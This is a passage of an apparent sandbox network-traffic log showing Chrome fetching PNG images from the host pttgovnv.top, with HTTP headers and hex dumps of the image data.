          2024-09-01 22:25:26 UTC1369INData Raw: 24 48 cd c6 85 19 ee 78 cd bb 49 db f4 20 e4 bd 41 cc 6d 67 27 24 14 36 e7 5c 86 7d dd b7 13 6f 82 d4 ed e8 9c 39 7b 43 4e d0 b1 43 96 b1 1f d0 45 42 a6 71 ef 3c d3 00 96 11 35 71 c8 c2 d4 11 fc 43 c8 5d 7a 17 9d 03 ac d4 24 55 e7 38 21 f4 b5 76 c2 7f 3c 57 55 5f 9b 21 07 74 e9 3b 33 e9 a9 06 fb 11 6a 15 36 32 28 df 5a c0 3c ba a1 cc ad c5 94 13 9b fd b4 8c b1 21 41 62 da 5d 50 78 9b b6 1e 06 26 dd 31 e2 e6 99 af b0 9a e9 b0 a7 0b 6c ea b2 34 12 9a bf c6 1c cd cc 47 33 84 37 bb 79 3d 4c 3f 68 b9 74 fa 35 ed c3 56 b5 f6 dd 8d 90 fd 56 b6 f5 52 c0 be 3f d7 34 00 42 1c d6 92 8c 87 65 f5 83 93 13 8c dd cc b8 a5 ef d5 67 0d 03 01 63 9c 6d d9 e3 66 cd 31 bf 03 0d 31 a3 c0 a1 bf 53 37 67 9b 73 37 f4 fd 56 c8 74 26 06 ca 18 8f 27 0b 72 10 50 f3 32 f1 19 a3 da 84
          Data Ascii: $HxI Amg'$6\}o9{CNCEBq<5qC]z$U8!v<WU_!t;3j62(Z<!Ab]Px&1l4G37y=L?ht5VVR?4Begcmf11S7gs7Vt&'rP2
          2024-09-01 22:25:26 UTC1369INData Raw: 8d de 84 65 9b 7b be 9c 65 6f 4e d9 0f 8e 02 f6 81 8e 13 c6 e2 d4 24 75 67 5c e6 6b 21 fb 63 67 8e 50 d9 73 42 58 35 e2 31 4e e6 e5 cc 70 27 d6 be 7f 18 71 df af f2 c4 06 ac 44 e5 cc 70 38 a4 14 56 94 d6 66 f9 27 b8 d6 8c cf 3e 2c ea 41 ad e2 d4 30 74 f5 20 3c 71 08 8f 59 7f 5b 7f af ae bf d3 b6 c7 5e d2 69 35 f5 37 db 11 e6 bd a4 d3 aa e8 6f 77 ad cf ea fa 59 67 d2 70 26 d6 38 67 45 67 d9 65 99 bb 61 cb 6e 8d 5b 26 9f 37 a7 1d e8 ad e7 54 96 dc e5 4e 63 bd 5a f3 38 6a 0e 9d a5 89 4d cb b5 69 9c e7 c7 5a 03 23 77 a2 0c 11 a3 bf 5f d7 ed 28 b4 8c 9c 6d b0 a4 af be b5 0e ba 11 7e 67 e6 70 60 2d d7 cc 1d d9 a3 0c d7 11 77 be 74 f9 fd 31 f1 3a 11 9e 17 eb 6f 27 27 e5 ec 6c 6f ad 38 c3 8b c4 99 86 ee 77 35 5d 6f 2d 67 5a 33 df 2c 10 f6 9b d6 33 5b fd e9 fa 63
          Data Ascii: e{eoN$ug\k!cgPsBX51Np'qDp8Vf'>,A0t <qY[^i57owYgp&8gEgean[&7TNcZ8jMiZ#w_(m~gp`-wt1:o''lo8w5]o-gZ3,3[c


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          75192.168.2.449817104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC361OUTGET /help/layout/images/38.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC726INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 11236
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"2be4-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHsoQ28BzRbxqu22dP0naYervlNe1opsk6Bq%2BCNpww20z%2FtLOjkKlcOdkVjp3eqLATqEIU1PDcXfCi91CQj4bVyPYqkcB7gkUh%2B9amMKU53AphSPRyn6Z3LrRCILkXA%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad19debf42fb-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC643INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 2b 71 49 44 41 54 78 da ec dd cb 75 db d8 96 06 60 54 af 3b b7 3b 02 b3 22 90 ee b4 27 a2 23 b0 6a d4 43 d3 11 58 15 81 e9 08 4a 8e c0 f4 f0 8e 4a 8e a0 e8 49 4f 2d 47 50 74 04 d7 8a c0 8d 2d 6d 5c b3 54 7a 10 e4 01 08 92 df b7 16 96 ea 21 91 20 08 1c fc 38 cf 9f be 7f ff 5e 01 00 b0 5b 7e 12 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<+qIDATxu`T;;"'#jCXJJIO-GPt-m\Tz! 8^[~888!!!@@@888
          2024-09-01 22:25:26 UTC1369INData Raw: 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 80 5b 37 e6 7f 7d 19 d5 3f 62 7b 5a 6f c7 2d fe f4 5b bd 5d c6 3f 7c ff df a3 b9 23 29 c4 01 00 dd 85 b5 e3 a5 2d fe fd a8 f0 db 7c aa b7 45 86 bb 4b e1 4e 88 03 00 d6 0b 6d e3 a5 ed d9 96 76 25 82 5d 84 b9 b9 50 27 c4 01 00 f7 07 b7 d3 7a 9b 54 e5 6b d9 4a b8 ca 40 77 11 5b 1d ea be f9 d6 84 38 00 38 d4 e0 f6 34 43 db 50 83 db 43 81 2e c2 dc 4c 0d 9d 10 07 00 87 14 de a2 5f db 59 bd bd dc 83 8f f3 b5 de ce 33 d0 a9 9d 13 e2 00 60
          Data Ascii: 888!!!!@@@888!!!!@@@[7}?b{Zo-[]?|#)-|EKNmv%]P'zTkJ@w[884CPC.L_Y3`
          2024-09-01 22:25:26 UTC1369INData Raw: 9b 5e 8b 3f 0f bd 8f 9c 10 37 cc 20 17 d5 b8 9f 37 39 d1 ab 1f fd 96 84 bb dd 29 f0 f7 ed 62 2c 7e 53 c8 11 71 9f 0b bd 5c 27 21 a9 e0 f7 f8 b6 de bf a9 2b 63 67 af e7 d3 0c 70 bb b6 dc 54 f4 1b 3d ed e2 01 6c c3 5a b8 c6 2f f5 fd ec 62 85 f7 9a 54 9b b7 6c 7c a8 df 6b 32 e4 2f eb 1f 2e b5 01 5e fc ff f3 e5 b2 3e 01 5f 6d 70 02 3e cb ed 64 e9 84 8e 1f 51 73 77 59 fd 68 92 15 ec e8 52 dc bc 7e cb 9b 59 a9 9b c2 53 87 95 1d 08 70 cb fd 9b 77 cd c9 f5 83 ff bf be 74 d1 6f b4 44 8d 64 94 27 17 2b fe 5e 89 f7 1a 34 cb 6e 0d 37 c8 c5 13 dc ab c2 2f 1b 49 2e fa 12 c5 6c db 7f d4 c1 ee 7b f4 c1 8b 01 15 d1 77 20 9b 72 a1 ab 9b c2 b1 43 c1 9e 87 b7 a7 d9 2d e2 f5 8e 7f 94 78 00 fb 9c fd 74 8b c8 a6 d4 12 c6 85 7f ef c1 e3 90 2d 63 42 1c 83 09 72 77 05 bb 28 70 a2
          Data Ascii: ^?7 79)b,~Sq\'!+cgpT=lZ/bTl|k2/.^>_mp>dQswYhR~YSpwtoDd'+^4n7/I.l{w rC-xt-cBrw(p
          2024-09-01 22:25:26 UTC1369INData Raw: c2 e2 26 9a c1 19 33 13 07 0f 26 cc 9d e6 b9 54 9a b0 0e b0 ca 7d f7 fb f7 ef 8e c2 2e dd 3c ff ef ba d3 ec e7 15 7e b5 09 51 f3 fc 19 23 a7 a2 36 ef db d2 d2 5d b3 0c 47 f7 79 9b 23 5e d7 dd d7 78 8f f8 fb d2 fd e6 22 80 9e ed 5b 13 eb 4f ff fa 52 ec 62 ac 03 d6 4f 3d ee f7 a4 fe f1 be e4 f7 5b ef ff d3 7b de 2b 02 de 1f 85 de e7 4b 5e 13 ab 8a 6b e8 e2 b1 69 21 0a 7e 8f 0f 2d 78 7e 97 f8 dd 99 45 ca 19 e8 bd 2b ee 05 6f 0a bd dc f3 ec d2 73 df 7b 95 2c 27 36 ba 0f 0a 71 dc 75 82 96 ba 69 46 18 7a ac 5f d3 87 1c 99 ba c9 fe 76 15 e6 22 a8 9e ae da 8f 4f 88 eb 74 df 4b 16 d0 e1 e7 bb a6 60 28 1c e2 d6 f5 2e 9b 94 3b ff 1e d7 f4 21 67 e8 07 21 6e cf 43 9c e6 d4 5d bc d9 df d4 40 bd 2a f0 52 ab 74 4c 7f 99 83 1e 36 d9 df 45 06 c1 52 6b f8 35 a2 16 71 61 29
          Data Ascii: &3&T}.<~Q#6]Gy#^x"[ORbO=[{+K^ki!~-x~E+os{,'6quiFz_v"OtK`(.;!g!nC]@*RtL6ERk5qa)
          2024-09-01 22:25:26 UTC1369INData Raw: 2e a6 57 2b fc 6a 13 ee a2 66 f0 4d ee 67 34 89 fc 5e dd 3d cc bd e9 00 3c 1d e4 f1 be f9 dc 1f d7 7d fa d6 59 b7 db 6b a1 e0 cd 6b e8 21 ee ec 10 f6 2f af 97 f7 7b 7c da 1e 15 ee 23 77 be 87 01 6e 39 c8 79 08 16 e2 f6 e6 86 15 fd de 66 19 88 da 0e b1 8f 75 17 37 ae c6 6f 11 e4 da ba 9e 37 68 c0 7d e5 a2 66 60 dd 66 55 23 55 bb b9 1e e2 7c 2e 75 33 bc ca 49 83 87 28 ce bb 57 f5 fe 0d 79 c9 a2 5f eb fd db f8 bb 58 aa 55 da 77 45 46 b0 e7 6b bc ec e1 fc fb 94 0f b2 6f 73 fb 90 ff ed 6b 0f c7 ca f4 23 03 a3 39 75 bd 9b d5 59 6e 9b 74 f0 3d 2e 51 40 66 d3 ea b7 bc 81 96 ee 70 dc f4 95 8b 15 14 a6 43 59 9a 25 f6 63 83 66 55 93 59 76 23 6a 20 4a 4d a1 d0 57 70 88 11 cf ab 9e d3 cd fa c1 17 75 40 ea eb 3a 88 9b f2 a2 c5 fe 2d 72 ff 4a 05 e0 8b 6a f7 07 31 ac 2a
          Data Ascii: .W+jfMg4^=<}Ykk!/{|#wn9yfu7o7h}f`fU#U|.u3I(Wy_XUwEFkosk#9uYnt=.Q@fpCY%cfUYv#j JMWpu@:-rJj1*
          2024-09-01 22:25:26 UTC1369INData Raw: af 6e 46 34 ad 3b 74 7b 30 23 7c b2 40 39 6f c2 4b d6 c2 c5 67 6b 56 79 b8 9e 31 bd fe ef 4f aa 1f 6b 3b 5e af ea 90 2f 11 ff 7c d1 77 c1 94 eb a9 ae 3a d5 c8 aa 1d 88 e3 f3 1e c5 03 c0 b6 96 3f da 73 bf 6a 46 1d 84 d2 37 e0 ad 3e f8 e4 88 d5 58 18 7e 9d 11 da ab ac 11 5d f2 78 6d 73 9a a7 92 d7 de 71 65 05 07 21 ae 70 78 1b 57 dd cc 28 df 88 c0 10 6b 2f 5e 2c bd e7 b4 5a af 99 36 82 c2 71 fd 5a 83 5b 0a 2a 3b 0c 5f ee c8 05 ba 58 f1 f8 af 5a 78 35 cd c8 d1 ac 3a b3 92 40 51 1f ea e3 a9 96 73 ff 42 dc 97 21 ac 4b 1c 2b 09 e4 3c 99 6d 26 2e 8e 1a c4 f3 16 e5 c2 4e 87 b8 0c bb 57 85 2a 38 c6 2e a3 ed d8 bb e6 d4 ec f7 36 ab ba 9b 51 fe 2a 6b 10 46 cb 01 2e cd 36 78 5d b3 5f f7 f3 64 f9 71 95 4e c4 d9 4f b1 29 dc 9e 54 9a 55 4b 07 b8 89 c3 30 18 25 43 c9 6c
          Data Ascii: nF4;t{0#|@9oKgkVy1Ok;^/|w:?sjF7>X~]xmsqe!pxW(k/^,Z6qZ[*;_XZx5:@QsB!K+<m&.NW*8.6Q*kF.6x]_dqNO)TUK0%Cl
          2024-09-01 22:25:26 UTC1369INData Raw: b8 ef ff 77 14 0b ce 5f d6 db f7 a5 6d 51 6f e7 f5 f6 d4 f9 87 10 b7 9d 20 77 99 85 dd a6 43 bf 63 a9 ab 59 9f fd ce 36 e8 df f7 5e 90 2b a6 cd e0 84 4f 59 03 cc 76 af f7 52 86 de fc d7 47 88 9b ef 7b 88 8b 49 c0 23 bc 55 37 5d 58 6e cf 37 1a 53 0a bd ae b7 08 73 ab 94 a9 87 74 fe 21 c4 f5 56 b0 c7 c8 d5 28 40 de 6d f8 52 31 3a 71 de e7 48 d0 0d 83 dc b1 53 78 7d 39 2f dc 8b 15 7f 7d dd 69 4b 18 ae ae ae 9f ab 42 af d3 47 39 54 b2 66 e9 59 1d 84 46 43 fa 82 73 15 97 79 f5 f8 64 f1 d1 9d e2 fd 0a 41 4e f3 33 42 5c 87 81 28 9a 28 37 ed 27 17 17 fb 65 de e0 87 1e e4 e6 6a e4 d6 0e 70 f1 14 3c 6b f1 27 a7 46 a3 0e 46 a9 90 d4 d5 4d b4 d4 8d fe 59 d7 2d 03 6b ac 68 f2 98 f1 50 4e 92 6c 22 9d 57 ed 96 3c 3c bf 67 f9 be e6 78 7d db 81 f3 0f 21 6e a7 83 dc 2c 2f
          Data Ascii: w_mQo wCcY6^+OYvRG{I#U7]Xn7Sst!V(@mR1:qHSx}9/}iKBG9TfYFCsydAN3B\((7'ejp<k'FFMY-khPNl"W<<gx}!n,/
          2024-09-01 22:25:26 UTC1369INData Raw: c4 3a cf d5 29 5e 55 ed ab f6 9b 9a b9 7f e7 93 fd 78 87 6f e6 93 bc d9 ae 12 e0 a2 90 fc 65 48 01 8e b5 75 5d b8 be c8 6b e4 8f a5 ed cf fa 7c 5b ac 38 a2 b5 eb 0e eb 47 0f ec df a4 f5 75 74 13 5e de 76 b4 af d7 a3 e6 eb 1b ec 7c dd 89 62 23 bc 65 ed db e7 8e 02 dc 87 36 01 2e 4d 3a 38 4e 9f bb e8 23 97 c7 7d 51 30 c0 5d 55 3d f5 7b e4 9e 6b 56 4d dc 4a 01 61 54 6d 56 33 17 41 70 ba ee d3 71 8b fd 8c 27 ac b3 6a b3 c9 2e bf e6 8d e7 a2 eb fd 2d f4 99 c7 f9 dd ac da b9 36 46 24 4f 86 f8 d9 d4 c4 ad 7d dc e6 d5 f6 3a 57 bf ca c9 b9 1f da bf 59 d5 6d 6d dc 83 b5 08 6d 97 8d cb 9a 9a cb aa 6c ed d2 7d 65 cd 3c 43 c0 e2 ae 9a a7 ac 19 8c 2d c2 c7 b8 ea b6 d6 35 02 c9 f1 1a 21 2e f6 f3 a2 60 30 ba 5d 5e 9d 6d 5a 2b 97 35 53 d3 0e ae 93 77 f5 be 9d ad b8 0f d3
          Data Ascii: :)^UxoeHu]k|[8Gut^v|b#e6.M:8N#}Q0]U={kVMJaTmV3Apq'j.-6F$O}:WYmmml}e<C-5!.`0]^mZ+5Sw
          2024-09-01 22:25:26 UTC1010INData Raw: 65 e4 7a 09 99 2b d6 7a 94 3e ae 9b b8 6e b1 28 d1 0c d8 d1 f1 8a ef 39 6a e6 5e 0c 68 b7 ae 47 f7 77 7d cc 36 ac 8d 6b 3b c1 70 3c 64 fc be e6 7b 6d 3c 01 b4 10 c7 7d 85 fc f1 d2 76 24 d0 ed cd 77 5b 6a c6 f7 7f ee 63 9f c1 0e ae a3 12 37 d1 af 31 2a ba a3 fd 9b 14 08 f5 d7 4b 23 f5 55 b3 9d e1 24 f6 7b d3 79 28 d7 fd ac 51 e6 9d 77 35 ea b4 83 e3 35 aa 7e cc db b9 ad 00 dc 7a 49 af 0d 3f 73 b4 12 cc ab f6 7d 04 d7 6a da 5c 73 c2 ea c1 8c c4 15 e2 0e 2b d8 8d f2 e7 c9 ad 0b 74 5e ed c8 82 f6 be cb eb 42 6a 93 7e 1c af 8c d4 6d 75 bc db f6 49 bd 1d 1a c6 5d 06 e6 a5 fd 1b af 11 8c 62 ff 26 db 7a 98 cb 5a 90 66 df bb 0a 28 5f b2 7c 9b f7 15 42 3a 3c 5e cd b2 82 e3 aa db 41 10 cd d2 5d d7 0f fb db 08 2a 19 e4 2e aa d5 6b 9c 37 5a 35 a1 7e bf 68 f2 7f bd e2
          Data Ascii: ez+z>n(9j^hGw}6k;p<d{m<}v$w[jc71*K#U${y(Qw55~zI?s}j\s+t^Bj~muI]b&zZf(_|B:<^A]*.k7Z5~h


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          76192.168.2.449819172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC599OUTGET /help/layout/images/44.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC724INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 17267
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"4373-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UUUfxxLGNHiKaU948FX5pVcMS2q4wNBFgKkGqfBnNFaqsIzHAyc6ySTz0FlxGBGHts43Ycmt%2FokTrAJAIF4gTqEpMSfWTJoNi0hfWlXcknV%2B1Vi%2FViRFhclutm3bbjk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1a0ca242b9-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC645INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 9b 00 00 00 fe 08 06 00 00 00 ec d6 a8 a5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 43 08 49 44 41 54 78 5e ed 9d 07 78 5d 47 99 fe e9 b0 0b 2c 0b 5b 80 5d 76 61 97 0d a1 06 96 14 20 40 0a 81 40 0a a1 84 c0 d2 61 29 0b fc 69 09 65 e9 2d f4 b2 0b 59 fa 12 ca 12 42 e2 f4 84 f4 1e 77 5b 96 64 c9 2a 96 6d b9 48 2e b2 6c 4b b6 6c c9 b6 e4 99 ff f7 7e 67 ae 72 75 35 f7 de 99 73 cf 91 ee 95 de 5f 9e ef b1 e3 7b ce 9c 73 e6 cc 99 77 ca 37 df 3c c0 12 42 08 21 39 43 b1 21 84 10 92 3b 14 1b 42 08 21 b9 43 b1 21 84 10 92 3b 14 1b 42 08 21 b9 43 b1 21 84 10 92 3b 14 1b 42 08 21 b9 43 b1 21 84 10 92
          Data Ascii: PNGIHDRsRGBgAMAapHYsodCIDATx^x]G,[]va @@a)ie-YBw[d*mH.lKl~gru5s_{sw7<B!9C!;B!C!;B!C!;B!C!
          2024-09-01 22:25:26 UTC1369INData Raw: 9a b0 db 46 0f 4f da 76 b1 81 b1 71 cd 2b 42 48 3c 73 66 18 cd 4c 8c 5a b3 ec 85 d6 ac 7e b3 88 ce 5d f2 0f d2 db 21 55 69 de 73 c0 1e 73 53 a7 7d d8 65 cd f6 01 7f f4 db 03 4b ec 41 72 ac cf 1e 2c f6 10 b1 3f 5b d0 6a ff fa ea 36 fb 82 db ba ed 67 5a b7 da 7b 07 46 b4 02 cf 02 69 56 d8 df f4 ee b2 ff 7c fd 1a fb 08 b9 ce c3 17 b4 c8 9f b0 56 bd ee e3 e5 ba df e9 d8 e1 8e 4e c7 f9 ab fa ec df 5e d5 66 1f 75 45 ab 7d 74 91 3d e6 ca d5 f6 44 79 a6 d6 a1 51 77 24 21 24 94 39 35 67 63 76 5c 61 cd c2 a3 ad 59 f4 6c 6b 56 9c 62 4d fb 7b ac d9 f4 23 e9 f5 5c 6b cd f0 72 6b 47 37 5a 3b be cf 1d 4d 76 8c 1d b6 ff 72 c3 1a fb 80 4b 57 89 f9 85 c6 6b 38 b6 aa 49 9a 7f 48 ec 21 72 ce 3f 5c db 6e df b2 b8 57 85 a7 96 1e cf 0f bb 07 92 74 0b f7 ec b9 ee 43 c4 6e e8 1f
          Data Ascii: FOvq+BH<sfLZ~]!UissS}eKAr,?[j6gZ{FiV|VN^fuE}t=DyQw$!$95gcv\aYlkVbM{#\krkG7Z;MvrKWk8IH!r?\nWtCn
          2024-09-01 22:25:26 UTC1369INData Raw: d4 4c cb f8 11 63 bf db b9 c3 3e fc 32 4f da e5 4c 84 e9 43 2b b7 b8 14 12 90 4e bd 88 cd cb ee a0 d8 10 12 c3 dc 17 9b d1 de 24 1a 40 a1 d7 a2 43 5f 62 a8 f4 e1 b6 0c ef b4 e5 27 5a b3 f2 95 89 23 00 86 d3 26 45 41 8e 5f 79 9a 35 7b 5b 5c 6a e5 31 13 63 3a 4c 66 ba 3e 9a 08 5b b5 9e 0e 7e c7 42 d1 6d 7f 90 93 67 67 68 ed f5 0b 37 cc 88 d8 14 f8 74 4b 7f d2 c3 f1 5d c3 63 a5 93 fc 31 62 f3 50 11 b6 bf b9 6a b5 da df 4e 5a 9b da 53 ae 6d d7 de d6 dd 3b a6 06 65 55 b1 b9 3a 2c fd 87 5f de a2 f7 82 61 3d 18 e6 92 60 58 74 fa 9c 1b 3b ec 27 9b fb 32 d9 ee 80 90 b9 c2 bc 70 10 30 23 ed 52 b1 17 89 08 26 f8 97 bf 58 fe 7c 9e eb 8d 54 9a 77 91 df da df e9 52 0a c3 1c 58 2f 3d 9d b3 13 07 81 6a ce 04 b8 7e e7 47 66 c5 81 60 a6 c5 66 f0 e0 b8 7d 14 e6 71 7c d7 f0
          Data Ascii: Lc>2OLC+N$@C_b'Z#&EA_y5{[\j1c:Lf>[~Bmggh7tK]c1bPjNZSm;eU:,_a=`Xt;'2p0#R&X|TwRX/=j~Gf`f}q|
          2024-09-01 22:25:26 UTC1369INData Raw: 24 36 1d c3 63 f6 a8 1b aa 37 20 a6 98 dc 57 e9 7c c7 e1 08 b1 49 13 bb 2c 46 6c 5e 7e 67 8f 3b 8b 10 12 c2 ac 8b cd f6 d1 c3 f6 ab ed db 92 98 57 21 15 5f c1 2e 6d b6 7f dc 1c b7 aa bf 80 d9 7c 51 d2 73 99 5c 67 73 be fc 63 7d 84 fe 37 6d ef 2a 12 1b 11 43 04 03 35 d9 8f fb 63 2a e4 d5 f7 86 8b cd 17 22 c5 06 f3 69 68 e5 7f 7d cd f6 c4 5d 39 46 68 c4 10 d3 6c a4 c4 01 24 6f b1 39 20 62 83 18 6a be f4 4a 8d 62 43 48 1c b3 2a 36 08 21 ff 17 57 b4 c6 89 4c c1 a4 f2 fa f9 ba f2 db 06 54 04 d1 02 d6 7e 3a e9 39 68 a5 2e 82 83 7d 6c ea 00 dd e1 b3 10 65 00 c3 78 4d a7 ab 8b 76 d6 40 6c ce 0e 15 1b b1 27 5c d3 6e 9f 7f 4b 97 3d f6 d6 c4 8e bb b5 5b ed f8 82 dd d6 6d 4f 70 f6 3c 39 ee d1 57 ca 7b 85 d7 59 9a 77 2b f6 ce a5 d3 37 4f 8b 11 9b d3 ee 88 17 83 18 b1
          Data Ascii: $6c7 W|I,Fl^~g;W!_.m|Qs\gsc}7m*C5c*"ih}]9Fhl$o9 bjJbCH*6!WLT~:9h.}lexMv@l'\nK=[mOp<9W{Yw+7O
          2024-09-01 22:25:26 UTC1369INData Raw: a0 35 4b 8e 4d 5c ac 8f f8 dd 7f e1 0c f1 fc 9b 3d 6e e0 ce 4e b9 3d 3c 1e 18 c4 e6 95 a1 62 23 79 fd d9 d6 ad da b3 84 0d 57 30 fc 8e 89 f6 3c 1c 37 20 36 79 ae 83 81 d8 fc 55 b0 d8 cc d0 8e ae 84 cc 11 6a 9e b3 c1 d8 3f 7a 38 4f ac e6 25 24 15 d6 93 ae 6e 8f de 16 c0 07 2a ca d7 22 d4 0a 04 47 ec fb 5d e9 c3 d6 d4 0b 66 68 b1 35 2b 4e b1 66 cc bf a8 11 55 f7 b7 3a 76 4c 8a ec 34 13 d1 b8 5a 7a 11 a1 24 62 b3 2e 58 6c be dc be cd 9d 39 7b c4 88 4d 1a 6f 31 15 1b e9 7d fb d2 2b 35 0c 05 13 42 c2 a9 59 6c 0a 5c 25 15 9d ae a9 f1 7c 98 c5 f6 9c 1b 3b ec c1 89 da 5b bd ab 87 46 75 f1 27 2a c2 27 5c db d6 f0 3b 22 9a 5d b7 95 15 1a b0 f3 e0 b8 0e 65 4d 99 ab 29 98 e4 c1 d1 37 76 ea 7e 40 a1 40 6c 4e 8f 10 9b af 50 6c a6 18 c5 86 90 38 32 13 1b 54 5e 0b b6 0c
          Data Ascii: 5KM\=nN=<b#yW0<7 6yUj?z8O%$n*"G]fh5+NfU:vL4Zz$b.Xl9{Mo1}+5BYl\%|;[Fu'*'\;"]eM)7v~@@lNPl82T^
          2024-09-01 22:25:26 UTC1369INData Raw: c0 30 5e 8f 54 6a b1 2d f4 27 5e d3 66 0f 64 30 04 18 2b 36 b1 1b dd e5 4d fb f0 68 d8 bd 57 b1 a3 e5 fd 23 32 41 29 bf 2e 8a 2c 9e da 44 80 b0 f8 b3 d6 86 01 21 73 81 59 15 1b 8c 8f a3 65 79 56 61 13 2f b4 3e 3d 1f 2d 26 6c f1 d1 7e ba a5 5f e7 72 10 c2 3e 2b 30 24 73 a5 88 0e c6 e9 31 3c 35 59 c1 e0 4f b9 a7 87 5c d6 62 9f 7c 6d bb 3d f3 ae 75 f6 53 72 7d 0c ed a1 37 72 fb f6 bd 1a ed fa 8f 9b f6 a8 17 dd 8f d6 0e d8 6f 48 6f ed 73 ab b7 da 8f ad ea d3 f9 97 37 2f ea d5 30 33 98 2b 7a b1 b4 76 8f b9 b1 43 5b be d8 3a 1b 22 f3 a8 05 91 ad 67 b9 9f 4f 48 af 26 0b 30 dc 13 3c 74 27 c7 d4 9b d8 a0 ec fc 7c dd ce ca bd e3 10 93 32 b7 c0 e3 b1 86 a1 4d 5d 73 13 f3 7e 3c 06 27 82 5a 36 8c 23 64 ae 30 ab 62 53 00 15 df 7d 22 22 a7 dc 51 a5 f2 c3 6f 52 e1 fe dd
          Data Ascii: 0^Tj-'^fd0+6MhW#2A).,D!sYeyVa/>=-&l~_r>+0$s1<5YO\b|m=uSr}7roHos7/03+zvC[:"gOH&0<t'|2M]s~<'Z6#d0bS}""QoR
          2024-09-01 22:25:26 UTC1369INData Raw: 17 93 f7 e1 7b 4f 05 5b f4 4c e9 e1 bc 41 1a 31 dc 84 8c 90 46 25 7b b1 e9 fd 9e 54 0e d2 a3 f1 55 1a f5 66 a8 c4 06 ae 77 77 4e 66 1a ed 01 2f 7b a1 ff dd 94 1a 7a a4 bb 6e 73 67 12 42 1a 8d 4c c5 06 73 21 66 f9 4b fd 95 45 3d 1a 7a 5f 9d 1f 65 ef 66 96 30 c3 2b e4 3d 1c 33 fd bd f8 0c 0d 83 be 5f ba 33 09 21 8d 46 b6 62 b3 f9 c7 52 29 54 19 7f af 27 43 0f 6c d5 59 a2 35 87 dd 13 90 99 c4 f4 5f 9c 08 be ef dd 4c 33 79 57 eb be e8 ce 24 84 34 1a 19 8a 8d b1 a6 fb 82 88 ca a3 0e 0c f7 ba f6 d3 7a ef 64 e6 31 eb bf 1c 51 5e 9e 2d bd d0 0f b9 33 09 21 8d 46 76 62 23 bd 03 d3 fc 9a a4 b7 e0 ad 2c ea d0 e0 95 36 b4 c8 3d 00 99 69 12 e7 80 08 b1 e9 f8 a0 3b 93 10 d2 68 64 26 36 66 e2 80 35 